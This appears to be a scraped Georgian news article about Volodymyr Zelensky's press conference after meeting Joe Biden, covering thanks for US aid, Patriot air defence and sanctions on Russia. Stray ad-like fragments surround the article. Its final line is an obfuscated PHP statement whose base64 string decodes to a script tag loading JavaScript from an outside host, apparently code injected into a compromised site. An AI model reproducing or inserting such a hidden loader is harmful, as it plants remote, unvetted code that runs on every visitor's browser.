celsiusi
ავერსი საქკაბელი
 "მე ჩამოვედი ამერიკაში იმისთვის, რომ მადლობა გადავუხადო ამერიკის მოსახლეობას", - ამის შესახებ უკრაინის პრეზიდენტმა ვოლოდიმირ ზელენსკიმ ჯო ბაიდენთან გამართული შეხვედრის შემდეგ გამართულ პრესკონფერენციაზე განაცხადა.
მისივე თქმით, უკრაინაში რუსეთის შეჭრის შემდეგ პრეზიდენტი ბაიდენი და ამერიკელი ხალხი მხარს ღიად უჭერს უკრაინას, რამაც ისინი "რეალური მოკავშირეები გახადა".
ზელენსკის ისაუბრა, Patriot-ის სისტემის მიწოდებაზე, პრეზიდენტმა აღნიშნა, რომ ის ყველაზე მეტად გააძლიერებს საჰაერო თავდაცვას და უკრაინისთვის უსაფრთხო საჰაერო სივრცეს შექმნის. 
 
"ჩვენ ნამდვილად ვიბრძვით ჩვენი საერთო გამარჯვებისთვის ამ ტირანიის წინააღმდეგ, რაც რეალურია და ჩვენ გავიმარჯვებთ" - განაცხადა ზელენსკიმ. "მე ნამდვილად მინდა, რომ ერთად გავიმარჯვოთ, უფრო სწორად, კი არ მინდა, დარწმუნებული ვარ! - თქვა მან.
შეხვედრაზე სტრატეგიულ ნაბიჯებზეც იმსჯელეს, რაც, მისი თქმით, "ყველა უკრაინელისთვის მნიშვნელოვანია". პრეზიდენტ ბაიდენს მან მადლობა გადაუხადა 45 მილიარდიანი დახმარებისთვის.
"ჩვენ უნდა გადავრჩეთ ამ ზამთარს, ჩვენ უნდა დავიცვათ ჩვენი ხალხი. ეს გადარჩენის საკითხია. ჩვენ ვიხილავთ სანქციებს და სამართლებრვ ზეწოლას ტერორისტულ ქვეყანას . რუსეთმა პასუხი უნდა აგოს ყველაფერზე, რასაც აკეთებს ჩვენი ხალხის წინააღმდეგ, ევროპის წინააღმდეგ და თავისუფალი მსოფლიოს წინააღმდეგ და ძალიან მნიშვნელოვანია, რომ ჩვენ გაგვაჩნია მშვიდობის ფორმულა, კონკრეტული ნაბიჯები,რა უნდა გააკეთოს ამერიკამ ჩვენს დასახმარებლად" - განაცხადა ზელენსკიმ.
ვოლოდიმირ ზელენსკი შეერთებულ შტატებში 21 დეკემბერს ჩავიდა. ის უკვე შეხვდა პრეზიდენტ ბაიდენს, მოგვიანებით კი კონგრესის წინაშე წარსდგება. 
523
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");